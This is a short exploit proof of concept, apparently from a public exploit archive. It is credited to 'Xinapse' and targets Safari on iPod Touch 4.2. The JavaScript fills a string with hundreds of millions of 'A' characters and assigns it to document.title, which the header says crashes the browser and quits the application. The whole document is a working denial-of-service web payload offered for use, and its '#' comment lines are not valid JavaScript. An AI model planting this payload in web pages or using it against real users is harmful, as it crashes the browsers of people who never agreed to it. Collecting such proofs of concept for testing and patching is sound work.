#
# Safari Ipod Touch 4.2 DOS BufferOverflow
# Causes a crash in the Ipod Touch 4g and then quits the Application
# Xinapse
# http://www.iexploit.org
#
var buffer = "";
for (var i = 0; i < 50000; i++) {
buffer += "A";
}
var b2 = buffer;
for (i = 0; i < 5000; i++) {
b2 += buffer;
}
document.title = b2;
|